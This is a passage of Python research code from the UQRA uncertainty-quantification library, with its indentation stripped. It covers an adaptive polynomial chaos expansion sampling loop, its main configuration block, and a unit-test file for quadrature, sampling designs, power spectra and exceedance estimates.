data_train.xi = np.concatenate([data_train.xi, data_excd.xi0_hat.reshape(ndim, 1)], axis=1)
data_train.x = np.concatenate([data_train.x , data_excd.x0_hat.reshape(ndim, 1)], axis=1)
data_train.y = np.concatenate([data_train.y , y0.reshape(1,-1)], axis=0)
data_ideg_QoIs[iqoi].data_train_[-1]= copy.deepcopy(data_train)
data_ideg_QoIs[iqoi].cv_err = data_ideg_QoIs[iqoi].cv_err_[-1]
data_ideg_QoIs[iqoi].score = data_ideg_QoIs[iqoi].score_ [-1]
data_ideg_QoIs[iqoi].model = data_ideg_QoIs[iqoi].model_ [-1]
data_ideg_QoIs[iqoi].y0_hat = data_ideg_QoIs[iqoi].y0_hat_[-1]
print(' 4. converge check ...')
is_QoIs_converge = []
y0_hat = np.array([ idata.y0_hat for idata in data_ideg_QoIs[iqoi].y0_hat_])
is_y0_converge , y0_converge_err = relative_converge(y0_hat, err=2*model_params.rel_err)
is_score_converge, score_converge = threshold_converge(data_ideg_QoIs[iqoi].score_)
is_PCE_accurate = abs(data_ideg_QoIs[iqoi].y0_hat.y0_hat - data_ideg_QoIs[iqoi].y0_hat.y0)\
/data_ideg_QoIs[iqoi].y0_hat.y0
data_ideg_QoIs[iqoi].iteration_converge = is_y0_converge and is_score_converge and is_PCE_accurate < 0.1
print(' > QoI: {:<25s}'.format(headers[iqoi]))
print(' > Values: {}'.format(np.array(y0_hat)))
print(' > Rel Error : {:5.2f} %, Converge: {}'.format(y0_converge_err*100, is_y0_converge ))
print(' > Fit Score : {:5.2f} %, Converge: {}'.format(score_converge *100, is_score_converge ))
print(' > Error of response at x0: {}, {:5.2f} %, y0_hat: {:.2f}, y0: {:.2f}'.format(
data_ideg_QoIs[iqoi].y0_hat.x0_hat, is_PCE_accurate*100,
data_ideg_QoIs[iqoi].y0_hat.y0_hat, data_ideg_QoIs[iqoi].y0_hat.y0))
print(' -------------------------------------------')
i_iteration +=1
if data_ideg_QoIs[iqoi].iteration_converge:
print(' !< Iteration converge for order {:d} >!'.format(deg))
break
if data_train.x.shape[1] > model_params.alpha*orth_poly.num_basis:
print(' PCE(d={:d},p={:d}) !< Number of samples exceeding {:.2f}P >!'.format(
ndim, deg, model_params.alpha))
break
#### end sequential sampling inner loop
### check the deg outer loop,
data_degs_QoIs[deg] = copy.deepcopy(data_ideg_QoIs)
print('--------------------------------------------------')
print(' Model Performance up to order p={:d}'.format(deg))
is_QoIs_converge = []
is_QoIs_overfit = []
iheader = headers[iqoi]
data_iqoi = [data_ideg_QoIs[iqoi] for data_ideg_QoIs in data_degs_QoIs[model_params.degs[0]: deg+1]]
cv_err_iqoi_degs = np.array([idata.cv_err for idata in data_iqoi]).T
y0_hat_iqoi_degs = np.array([idata.y0_hat.y0_hat for idata in data_iqoi]).T
score_iqoi_degs = np.array([idata.score for idata in data_iqoi]).T
is_overfit , overfit_vals = overfitting_check(cv_err_iqoi_degs) ## check Overfitting
is_y0_converge , y0_converge_err = relative_converge(y0_hat_iqoi_degs, err=model_params.rel_err)
is_score_converge, score_converge = threshold_converge(score_iqoi_degs)
data_degs_QoIs[deg][iqoi].deg_overfit = is_overfit
data_degs_QoIs[deg][iqoi].deg_converge = is_y0_converge and is_score_converge
print(' > QoI: {:<25s}'.format(iheader))
print(' > Values: {}'.format(np.array(y0_hat_iqoi_degs)))
print(' > Overfit : {}; CV errors: {}'.format(is_overfit, overfit_vals))
print(' > Rel Error [%]: {:5.2f}, Converge: {}'.format(y0_converge_err*100, is_y0_converge ))
print(' > Fit Score [%]: {:5.2f}, Converge: {}'.format(score_converge *100, is_score_converge ))
print('--------------------------------------------------')
if len(y0_hat_iqoi_degs) < 3:
deg = deg + 1
continue
if not data_degs_QoIs[deg][iqoi].deg_overfit and data_degs_QoIs[deg][iqoi].deg_converge and \
data_degs_QoIs[deg][iqoi].iteration_converge:
break
elif data_degs_QoIs[deg][iqoi].deg_overfit:
deg = deg - 1
continue
else:
deg = deg + 1
return data_degs_QoIs
if __name__ == '__main__':
## ------------------------ Displaying set up ------------------- ###
r, theta = 0, 1## r is the number of repeated MCS samples, availble in 0 to 9
## batch parameters are used to validate the uncertainty due to sampling on same theta and same r
## not used for practice, only for benchmark validation
# ith_batch = 0
# batch_size = 1
random_state = 0
np.random.seed(random_state)
random.seed(random_state)
np.set_printoptions(precision=4)
np.set_printoptions(threshold=1000)
np.set_printoptions(suppress=True)
uqra_env = uqra.environment.NDBC46022()
eng = matlab.engine.start_matlab()
out = io.StringIO()
err = io.StringIO()
## ------------------------ Define solver ----------------------- ###
# solver = uqra.FPSO(random_state=theta, distributions=uqra_env)
solver = uqra.Solver('RM3', 2, distributions=uqra_env)
## ------------------------ UQRA Modeling Parameters ----------------- ###
model_params = uqra.Modeling('PCE')
model_params.degs = np.arange(2,8) #[2,6,10]#
model_params.ndim = solver.ndim
model_params.basis = 'Heme'
model_params.dist_u = stats.uniform(0,1) #### random CDF values for samples
model_params.fitting = 'OLSLAR'
model_params.n_splits= 10
model_params.alpha = 3
model_params.num_test= int(1e7)
model_params.pf = np.array([1.0/(365.25*24*50)])
model_params.abs_err = 1e-4
model_params.rel_err = 2.5e-2
model_params.n_jobs = mp.cpu_count()
model_params.channel = [2, 12, 23, 24, 25]
model_params.y_scales= np.zeros(34)
model_params.y_scales[model_params.channel]= [1, 1e7, 1e6, 1e7, 1]
model_params.update_basis()
model_params.info()
## ------------------------ UQRA DOE Parameters ----------------- ###
doe_params = uqra.ExperimentParameters('MCS', 'S')
doe_params.update_poly_name(model_params.basis)
doe_params.num_cand = int(1e5)
## ------------------------ UQRA Simulation Parameters ----------------- ###
sim_params = uqra.Simulation(solver, model_params, doe_params)
filename_test = lambda r: r'McsE7R{:d}'.format(r)
sim_params.update_filenames(filename_test)
data_dir_cand = doe_params.data_dir_cand
data_dir_optimal= doe_params.data_dir_optimal
filename_testin = sim_params.fname_testin(r)
filename_test = sim_params.fname_test(r)
data_dir_result = sim_params.data_dir_result
figure_dir = sim_params.figure_dir
data_dir_test = sim_params.data_dir_test
data_dir_testin = sim_params.data_dir_testin
### 1. Get test data set
data_test = np.load(os.path.join(data_dir_test, filename_test), allow_pickle=True).tolist()
data_test.x = solver.map_domain(data_test.u, model_params.dist_u)
data_test.xi= model_params.map_domain(data_test.u, model_params.dist_u)
xi_test = data_test.xi[:, :model_params.num_test]
x_test = data_test.x [:, :model_params.num_test]
### 2. Get finished global data
filename = '{:s}_Adap{:d}{:s}_{:s}E5R{:d}_global.npy'.format(solver.nickname,
solver.ndim, model_params.basis[:3], doe_params.doe_nickname(), r)
global_data = np.load(os.path.join(data_dir_result, filename), allow_pickle=True).tolist()
headers = global_data[0].headers
print('\n#################################################################################')
print(' >>> File: ', __file__)
print(' >>> Start UQRA : Theta: {:d}'.format(theta))
print(' >>> Test data R={:d}'.format(r))
print('#################################################################################\n')
print(' > {:<25s}'.format('Input/Output Directories:'))
print(' - {:<23s} : {}'.format (' Candiate samples' , data_dir_cand))
print(' - {:<23s} : {:s}'.format(' UQRA DoE data ' , data_dir_optimal))
print(' - {:<23s} : {:s}'.format(' Test input ' , data_dir_testin))
print(' - {:<23s} : {:s}'.format(' Test output' , data_dir_test))
print(' - {:<23s} : {:s}'.format(' UQRA output data ' , data_dir_result))
print(' - {:<23s} : {:s}'.format(' UQRA output figure', figure_dir))
print(' > {:<25s}'.format('Input/Output files'))
print(' - {:<23s} : {}'.format(' Test input data' , filename_testin))
print(' - {:<23s} : {}'.format(' Test output data' , filename_test ))
res = main(model_params, doe_params, solver, r=r, random_state=random_state, theta=theta)
filename = '{:s}_Adap{:d}{:s}_{:s}E5R{:d}S{:d}'.format(solver.nickname,
solver.ndim, model_params.basis, doe_params.doe_nickname(), r, theta)
eng.quit()
# ## ============ Saving QoIs ============
res = np.array(res, dtype=object)
try:
np.save(os.path.join(data_dir_result, filename), res, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(data_dir_result, filename)))
except:
np.save(filename, res, allow_pickle=True)
print(' >> Simulation Done! Data saved to {:s}'.format(os.path.join(os.getcwd(), filename)))
```
#### File: UQRA/tests/test_basic.py
```python
import uqra, unittest,warnings,os, sys
from tqdm import tqdm
import numpy as np, scipy as sp
from uqra.solver.PowerSpectrum import PowerSpectrum
from uqra.environment import Kvitebjorn as Kvitebjorn
from sklearn import datasets
from sklearn.linear_model import LinearRegression
from sklearn.model_selection import KFold
import pickle
warnings.filterwarnings(action="ignore", module="scipy", message="^internal gelsd")
sys.stdout = uqra.utilities.classes.Logger()
data_dir = '/Users/jinsongliu/BoxSync/MUSELab/uqra/examples/JupyterNotebook'
class BasicTestSuite(unittest.TestCase):
"""Basic test cases."""
def test_mPCE(self):
foo = lambda x: x**3 + 0.5*x + np.random.randn(*x.shape)
dist = cp.Normal()
x = dist.sample(1000).reshape(1,-1)
print(x.shape)
y = np.squeeze(np.array([foo(x), foo(x)]).T)
print(y.shape)
# basis = cp.orth_ttr(5, dist)
foo_hat = uqra.PCE(5, dist)
foo_hat.fit(x, y, method='OLS')
y_pred = foo_hat.predict(x)
print(y_pred.shape)
foo_hat = uqra.mPCE(5, dist)
foo_hat.fit(x, y, method='OLS')
y_pred = foo_hat.predict(x)
print(y_pred.shape)
def test_moments(self):
# np.set_printoptions(precision=3)
data_dir = '/Volumes/External/MUSE_UQ_DATA/Ishigami/Data'
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set[-1,:])
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
print('--> GLK')
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE6_GLK.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
print('--> OLS')
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_OLS.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
print('--> OLSLARS')
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_OLSLARS.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
print('--> LASSOLARS')
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_LASSOLARS.npy'.format(r)
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
moments = uqra.metrics.moment(np.array(y),moment=[1,2,3,4], axis=1, multioutput='raw_values')
print(np.mean(moments, axis=1))
print(np.std(moments, axis=1))
def test_loo(self):
# Loading some example data
X, y = datasets.load_boston(return_X_y=True)
# X = X[:100,:2]
# y = y[:100]
# X = np.array([[0, 0], [1, 1], [2, 2]])
# y = np.array([0, 1, 2])
# print(X.shape)
print(y[:5])
# Training classifiers
reg1 = LinearRegression()
reg1.fit(X,y)
y1 = reg1.predict(X)
# print(reg1.coef_)
print(y1[:5])
# b = np.linalg.lstsq(X,y)[0]
# # print(b)
# y2 = np.dot(X, np.array(b))
# print(y2[:5])
mse = []
kf = KFold(n_splits=X.shape[0])
residual = []
for train_index, test_index in kf.split(X):
X_train, X_test = X[train_index], X[test_index]
y_train, y_test = y[train_index], y[test_index]
# H1 = np.linalg.inv(np.dot(X_train.T, X_train))
# H2 = np.dot(H1, X_train.T)
# H3 = np.dot(H2, y_train)
# y_hat = np.dot(X_test, H3)
# residual.append(y_test[0]- y_hat[0])
reg1.fit(X_train, y_train)
y_pred = reg1.predict(X_test)
residual.append(y_test[0] - y_pred[0])
# mse.append(uqra.metrics.mean_squared_error(y_test, y_pred))
Q, R = np.linalg.qr(X)
H = np.dot(Q, Q.T)
h = np.diagonal(H)
y_hat = np.dot(H, y)
e = (y-y_hat)/(1-h)
print(y_hat[:5])
print('e:')
print(np.mean(np.array(residual)**2))
print(np.mean(np.array(e)**2))
# print(uqra.metrics.leave_one_out_error(X,y,is_adjusted=False))
# print(np.mean(mse))
def test_QuadratureDesign(self):
print('>>> 1D quadrature design:')
p = 4
doe = uqra.QuadratureDesign(p, ndim=1, dist_names=['uniform',])
doe.samples()
print(' Legendre:')
print(' {:<15s} : {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} : {}'.format('Weights' , np.around(doe.w, 2)))
doe = uqra.QuadratureDesign(p, ndim=1, dist_names=['normal',])
doe.samples()
print(' Hermite:')
print(' {:<15s} : {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} : {}'.format('Weights' , np.around(doe.w, 2)))
print('>>> 1D quadrature design: Changing interval ')
a = -np.pi
b = np.pi
loc = a
scale = b - loc
print(' Legendre ({},{})'.format(np.around(a,2), np.around(b,2)))
doe = uqra.QuadratureDesign(p, ndim=1, dist_names=['uniform',])
doe.samples()
print(' From chaning inverval after uqra.doe:')
print(' {:<15s} : {}'.format('Abscissa', np.around((b-a)/2*doe.u + (a+b)/2, 2)))
print(' {:<15s} : {}'.format('Weights' , np.around((b-a)/2*doe.w, 2)))
doe = uqra.QuadratureDesign(p, ndim=1, dist_names=['uniform',], dist_theta=[(loc, scale)])
doe.samples()
print(' Directly from uqra.doe:')
print(' {:<15s} : {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} : {}'.format('Weights' , np.around(doe.w, 2)))
print('>>> 2D quadrature design:')
p = 4
doe = uqra.QuadratureDesign(p, ndim=2, dist_names=['uniform',])
doe.samples()
print(' Legendre:')
print(' {:<15s} :\n {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} :\n {}'.format('Weights' , np.around(doe.w, 2)))
doe = uqra.QuadratureDesign(p, ndim=2, dist_names=['normal',])
doe.samples()
print(' Hermite:')
print(' {:<15s} :\n {}'.format('Abscissa', np.around(doe.u, 2)))
print(' {:<15s} :\n {}'.format('Weights' , np.around(doe.w, 2)))
def test_RandomDesign(self):
doe = uqra.RandomDesign('MCS', n_samples=1e6, ndim=3, dist_names='uniform', dist_theta=[(-np.pi, 2*np.pi),]*3)
doe.samples()
def test_LatinHyperCube(self):
doe = uqra.LHS(distributions=[sp.stats.norm,]*2)
doe_u, doe_x = doe.samples(2000)
print(doe_x.shape)
print(np.mean(doe_x, axis=1))
print(np.std(doe_x, axis=1))
np.save('/Users/jinsongliu/BoxSync/PhD_UT/Working_Papers/AdaptiveSparsePCE_OED/Data/LHS_Normal_2000', doe_x)
# doe = uqra.LHS(n_samples=1e3,dist_names=['uniform', 'norm'],ndim=2,dist_theta=[(-1, 2*2), (2,1)])
# doe.samples()
# print(np.mean(doe.x, axis=1))
# print(np.std(doe.x, axis=1))
def test_OptimalDesign(self):
"""
Optimal Design
"""
### Ishigami function
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/Ishigami/Data'
### SDOF system
data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# data_dir = 'E:\Run_MUSEUQ'
np.random.seed(100)
# dist_x = cp.Normal()
dist_u= cp.Iid(cp.Normal(),2)
u_samples = dist_u.sample(100)
basis = cp.orth_ttr(10,dist_u)
X = basis(*u_samples).T
doe = uqra.OptimalDesign('D', n_samples=10)
doe_index = doe.samples(X, is_orth=True)
doe_index = doe.adaptive(X, n_samples=10)
print(doe_index)
doe_index = doe.adaptive(X, n_samples=10)
print(doe_index)
### 2D
# quad_orders = range(4,11)
# alpha = [1.0, 1.1, 1.3, 1.5, 2.0,2.5, 3.0,3.5, 5]
# dist_u= cp.Iid(cp.Normal(),2)
# for iquad_orders in quad_orders:
# basis = cp.orth_ttr(iquad_orders-1,dist_u)
# for r in range(10):
# filename = 'DoE_McsE6R{:d}_stats.npy'.format(r)
# data_set = np.load(os.path.join(data_dir, filename))
# samples_y = np.squeeze(data_set[:,4,:]).T
# filename = 'DoE_McsE6R{:d}.npy'.format(r)
# data_set = np.load(os.path.join(data_dir, filename))
# samples_u = data_set[0:2, :]
# samples_x = data_set[2:4, :]
# # samples_y = data_set[6 , :].reshape(1,-1)
# print('Quadrature Order: {:d}'.format(iquad_orders))
# print('Candidate samples filename: {:s}'.format(filename))
# print(' >> Candidate sample set shape: {}'.format(samples_u.shape))
# design_matrix = basis(*samples_u).T
# print(' >> Candidate Design matrix shape: {}'.format(design_matrix.shape))
# for ia in alpha:
# print(' >> Oversampling rate : {:.2f}'.format(ia))
# doe_size = min(int(len(basis)*ia), 10000)
# doe = uqra.OptimalDesign('S', n_samples = doe_size )
# doe.samples(design_matrix, u=samples_u, is_orth=True)
# data = np.concatenate((doe.I.reshape(1,-1),doe.u,samples_x[:,doe.I], samples_y[:,doe.I]), axis=0)
# filename = os.path.join(data_dir, 'DoE_McsE6R{:d}_p{:d}_OptS{:d}'.format(r,iquad_orders,doe_size))
# np.save(filename, data)
# for ia in alpha:
# print(' >> Oversampling rate : {:.2f}'.format(ia))
# doe_size = min(int(len(basis)*ia), 10000)
# doe = uqra.OptimalDesign('D', n_samples = doe_size )
# doe.samples(design_matrix, u=samples_u, is_orth=True)
# data = np.concatenate((doe.I.reshape(1,-1),doe.u,samples_x[:,doe.I], samples_y[:,doe.I]), axis=0)
# filename = os.path.join(data_dir, 'DoE_McsE6R{:d}_p{:d}_OptD{:d}'.format(r,iquad_orders,doe_size))
# np.save(filename, data)
def test_gauss_quadrature(self):
"""
https://keisan.casio.com/exec/system/1329114617
"""
print('========================TESTING: 1D GAUSS QUADRATURE=======================')
dists2test = [cp.Uniform(-1,1), cp.Normal(), cp.Gamma(1,1), cp.Beta(1,1)]
rules2test = ['leg', 'hem', 'lag', 'jacobi']
order2test = [2,3,4,5,6,7,8]
for idist2test, irule2test in zip(dists2test, rules2test):
print('-'*50)
print('>>> Gauss Quadrature with polynominal: {}'.format(const.DOE_RULE_FULL_NAMES[irule2test.lower()]))
uqra.blockPrint()
quad_doe = uqra.DoE('QUAD', irule2test, order2test, idist2test)
uqra_samples = quad_doe.get_samples()
# quad_doe.disp()
uqra.enablePrint()
if irule2test == 'hem':
for i, iorder in enumerate(order2test):
print('>>> order : {}'.format(iorder))
coord1d_e, weight1d_e = np.polynomial.hermite_e.hermegauss(iorder)
print('{:<15s}: {}'.format('probabilist', np.around(coord1d_e,2)))
coord1d, weight1d = np.polynomial.hermite.hermgauss(iorder)
print('{:<15s}: {}'.format('physicist', np.around(coord1d,2)))
print('{:<15s}: {}'.format('uqra', np.around(np.squeeze(uqra_samples[i][:-1,:]),2)))
elif irule2test == 'leg':
for i, iorder in enumerate(order2test):
print('>>> order : {}'.format(iorder))
coord1d, weight1d = np.polynomial.legendre.leggauss(iorder)
print('{:<15s}: {}'.format('numpy ', np.around(coord1d,2)))
print('{:<15s}: {}'.format('uqra', np.around(np.squeeze(uqra_samples[i][:-1,:]),2)))
elif irule2test == 'lag':
for i, iorder in enumerate(order2test):
print('>>> order : {}'.format(iorder))
coord1d, weight1d = np.polynomial.laguerre.laggauss(iorder)
print('{:<15s}: {}'.format('numpy ', np.around(coord1d,2)))
print('{:<15s}: {}'.format('uqra', np.around(np.squeeze(uqra_samples[i][:-1,:]),2)))
elif irule2test == 'jacobi':
print('NOT TESTED YET')
print('Compared results here: https://keisan.casio.com/exec/system/1329114617')
def test_gpce(self):
print('==================TESTING: Generalized PCE (Not using SurrogateModel) ===================')
gpce_dist_to_test = [cp.Normal(), cp.Normal(2,3), cp.Gamma(1,1), cp.Beta(1,1)]
gpce_opt_dist = [cp.Normal(), cp.Normal(), cp.Gamma(1,1), cp.Beta(1,1)]
gpce_opt_rule = ['hem', 'hem', 'lag', 'jacobi']
npoly_orders = range(2,5)
dist_zeta0 = cp.Normal()
for i, igpce_dist in enumerate(gpce_dist_to_test):
dist_zeta1 = gpce_opt_dist[i]
print('>>> Testing # {:d}: gpce: {}, zeta0: {} , zeta1: {}'.format(i, igpce_dist, dist_zeta0, dist_zeta1 ))
for ipoly_order in npoly_orders:
print(' Polynomial order: {:d}'.format(ipoly_order))
## gPCE with hermite chaos
uqra.blockPrint()
quad_doe = uqra.DoE('QUAD', 'hem', [ipoly_order+1], dist_zeta0)
samples_zeta= quad_doe.get_samples()
zeta_cor, zeta_weight = samples_zeta[0]
zeta_cor = zeta_cor.reshape((len(dist_zeta0),-1))
x_cor = igpce_dist.inv(dist_zeta0.cdf(zeta_cor))
zeta_poly, zeta_norms = cp.orth_ttr(ipoly_order, dist_zeta0, retall=True)
x_hat,coeffs = cp.fit_quadrature(zeta_poly, zeta_cor, zeta_weight,np.squeeze(x_cor),retall=True)
uqra.enablePrint()
print('\t Hermite: {}'.format( np.around(coeffs,4)))
## gPCE with optimal chaos
uqra.blockPrint()
quad_doe = uqra.DoE('QUAD', gpce_opt_rule[i], [ipoly_order+1], dist_zeta1)
samples_zeta= quad_doe.get_samples()
zeta_cor, zeta_weight = samples_zeta[0]
zeta_cor = zeta_cor.reshape((len(dist_zeta1),-1))
x_cor = igpce_dist.inv(dist_zeta1.cdf(zeta_cor))
zeta_poly, zeta_norms = cp.orth_ttr(ipoly_order, dist_zeta1, retall=True)
x_hat,coeffs = cp.fit_quadrature(zeta_poly, zeta_cor, zeta_weight, np.squeeze(x_cor), retall=True)
uqra.enablePrint()
print('\t Optimal: {}'.format( np.around(coeffs,4)))
def test_PowerSpectrum(self):
print('========================TESTING: Power Spectrum =======================')
powerspecturms2test = ['jonswap']
powerspecturms_args = [(8, 10)]
df = 0.00001
f = np.arange(0, 10, df)
for psd_name, psd_args in zip(powerspecturms2test, powerspecturms_args):
psd = PowerSpectrum(psd_name, *psd_args)
psd_f, psd_pxx = psd.get_pxx(f)
psd_area = np.sum(psd_pxx * df)
np.save(os.path.join(data_dir,psd_name+'_psd_f'), psd_f)
np.save(os.path.join(data_dir,psd_name+'_psd_pxx'), psd_pxx)
tau, acf = psd.get_acf()
np.save(os.path.join(data_dir,psd_name+'_tau'), tau)
np.save(os.path.join(data_dir,psd_name+'_acf'), acf)
t, eta = psd.gen_process()
np.save(os.path.join(data_dir,psd_name+'_t'), t)
np.save(os.path.join(data_dir,psd_name+'_eta'), eta)
print(t, eta)
# t, eta = psd._gen_process_sum()
print('PSD name: {:s}, args: {}, Area: {:.2f}, 4*std:{}'.format(psd_name, psd_args, psd_area, 4*np.std(eta)))
def test_weighted_exceedance(self):
print('========================TESTING: Weighted Exceedance =======================')
# x = np.random.normal(size=1000).reshape(1,-1)
# res1 = stats.cumfreq(x)
# cdf_x = res1.lowerlimit + np.linspace(0, res1.binsize*res1.cumcount.size, res1.cumcount.size)
# cdf_y = res1.cumcount/x.size
# ecdf_y = 1- cdf_y
# ecdf_x = cdf_x
# print(np.around(ecdf_x,2))
# print(np.around(ecdf_y,2))
# res2 = uqhelpers.get_weighted_exceedance(x)
# print(res2.shape)
# print(np.around(res2[0],2))
# print(np.around(res2[1],2))
# orders = [4] ## mcs
orders = range(3,10) ## quad
repeat = range(10)
data_dir_out= '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
data_dir_in = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
for iorder in orders:
for r in repeat:
filename = 'DoE_IS_McRE6R{:d}_weight.npy'.format(r)
weights = np.load(os.path.join(data_dir_out, filename))
##>>> MCS results from true model
# filename = 'DoE_IS_McRE{:d}R{:d}_stats.npy'.format(iorder,r)
# data_out = np.load(os.path.join(data_dir_out, filename))
# y = np.squeeze(data_out[:,4,:]).T
filename = 'DoE_IS_QuadHem{:d}_PCE_pred_E6R{:d}.npy'.format(iorder, r)
data_out = np.load(os.path.join(data_dir_out, filename))
y = data_out
print(y.shape)
# filename = 'DoE_McRE{:d}R{:d}_stats.npy'.format(iorder, r)
# data_out = np.load(os.path.join(data_dir, filename))
# y = np.squeeze(data_out[:,4,:]).T
print(r' - exceedance for y: {:s}'.format(filename))
for i, iy in enumerate(y):
print('iy.shape = {}'.format(iy.shape))
print('weights.shape = {}'.format(weights.shape))
res = stats.cumfreq(iy,numbins=iy.size, weights=weights)
cdf_x = res.lowerlimit + np.linspace(0, res.binsize*res.cumcount.size, res.cumcount.size)
cdf_y = res.cumcount/res.cumcount[-1]
excd = np.array([cdf_x, cdf_y])
np.save(os.path.join(data_dir_out,filename[:-4]+'_y{:d}_ecdf'.format(i)), excd)
def test_exceedance(self):
print('========================TESTING: Lienar Oscillator =======================')
# print('Testing: 1D')
# a = np.random.randint(0,10,size=10)
# print(a)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3)
# print('1D: return_index=False')
# print(a_excd)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3, return_index=True)
# print('1D: return_index=True')
# print(a_excd)
# print('Testing: 2D')
# a = np.random.randint(0,10,size=(2,10))
# print(a)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3)
# print('2D: isExpand=False, return_index=False')
# print(a_excd)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3, return_index=True)
# print('2D: isExpand=False, return_index=True')
# print(a_excd)
# a_excd=uqhelpers.get_exceedance_data(a, prob=1e-3, isExpand=True, return_index=True)
# print('2D: isExpand=True, return_index=True')
# print(a_excd)
# # return_period= [1,5,10]
# # prob_fails = [1/(p *365.25*24*3600/1000) for p in return_period]
# return_period= [1]
# prob_fails = [1e-5]
# quad_orders = range(3,10)
# mcs_orders = [6]
# repeat = range(10)
# orders = mcs_orders
# # orders = quad_orders
# return_all = False
# data_dir_out= '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# data_dir_in = '/Users/jinsongliu/External/MUSE_UQ_DATA/linear_oscillator/Data'
# # data_dir_out= '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
# # data_dir_in = '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
# # data_dir_in = '/Users/jinsongliu/Google Drive File Stream/My Drive/MUSE_UQ_DATA/linear_oscillator'
# for ipf, ip in zip(prob_fails, return_period):
# print('Target exceedance prob : {:.1e}'.format(ipf))
# for iorder in orders:
# for r in repeat:
# ## input
# filename = 'DoE_McRE6R{:d}.npy'.format(r)
# # filename = 'DoE_McRE7R{:d}.npy'.format(r)
# data_in = np.load(os.path.join(data_dir_in, filename)) # [u1, u2,..., x1, x2...]
# ##>>> MCS results from surrogate model
# filename = 'DoE_QuadHem{:d}_GPR_pred_E6R{:d}.npy'.format(iorder, r)
# filename = 'DoE_QuadHem{:d}R24_mPCE_Normal_pred_E7R{:d}.npy'.format(iorder, r)
# filename = 'DoE_QuadHem{:d}_PCE_Normal_pred_E7R{:d}.npy'.format(iorder, r)
# data_out = np.load(os.path.join(data_dir_out, filename))
# y = data_out
# ##>>> MCS results from true model
# ## bench 4
# # filename = 'DoE_McRE{:d}R{:d}_y_Normal.npy'.format(iorder,r)
# # data_out = np.load(os.path.join(data_dir_out, filename))
# # y = data_out.reshape(1,-1)
# filename = 'DoE_McRE6R{:d}_stats.npy'.format(r)
# data_out = np.load(os.path.join(data_dir_out, filename))
# y = np.squeeze(data_out[:,4,:]).T
# print(y.shape)
# # filename = 'DoE_McRE{:d}R{:d}_stats.npy'.format(iorder, r)
# # data_out = np.load(os.path.join(data_dir, filename))
# # y = np.squeeze(data_out[:,4,:]).T
# print(r' - exceedance for y: {:s}'.format(filename))
# for i, iy in enumerate(y):
# data_ = np.vstack((iy.reshape(1,-1), data_in))
# iexcd = uqhelpers.get_exceedance_data(data_, ipf, isExpand=True, return_all=return_all)
# return_all_str = '_all' if return_all else ''
# np.save(os.path.join(data_dir_out,filename[:-4]+'_y{:d}_ecdf_P{:d}{}'.format(i, ip, return_all_str )), iexcd)
# data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/BENCH4/Data'
# p = 1e-5
# print('Target exceedance prob : {:.1e}'.format(p))
# # error_name = 'None'
# # error_name = 'Normal'
# error_name = 'Gumbel'
# for r in range(10):
# # filename = 'DoE_McRE7R{:d}_y_{:s}.npy'.format(r, error_name.capitalize())
# # filename = 'DoE_QuadHem5_PCE_{:s}_pred_r{:d}.npy'.format(error_name.capitalize(), r)
# filename = 'DoE_QuadHem5R24_mPCE_{:s}_pred_r{:d}.npy'.format(error_name.capitalize(), r)
# data_set = np.load(os.path.join(data_dir, filename))
# y = np.squeeze(data_set)
# print(r' - exceedance for y: {:s}'.format(filename))
# y_excd=uqhelpers.get_exceedance_data(y, p)
# np.save(os.path.join(data_dir, filename[:-4]+'_ecdf_pf5.npy'), y_excd)
data_dir = '/Users/jinsongliu/External/MUSE_UQ_DATA/Ishigami/Data'
excd_prob= [1e-6]
print('Target exceedance prob : {}'.format(excd_prob))
y_excd = []
for iexcd_prob in excd_prob:
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_OLS.npy'.format(r)
print(r' - exceedance for y: {:s}'.format(filename))
data_set = np.load(os.path.join(data_dir, filename))
y.append(data_set)
y_ecdf = uqhelpers.ECDF(np.array(y).T, alpha=iexcd_prob, is_expand=False)
filename = os.path.join(data_dir,'DoE_McsE6_PCE9_OLS_pf6_ecdf.pickle')
with open(filename, 'wb') as handle:
pickle.dump(y_ecdf, handle)
y_excd = []
for iexcd_prob in excd_prob:
y = []
for r in range(10):
filename = 'DoE_McsE6R{:d}_PCE9_LASSOLARS.npy'.format(r)
print(r' - exceedance for y: {:s}'.format(filename))
data_set = np.load(os.path.join(data_dir, filename))
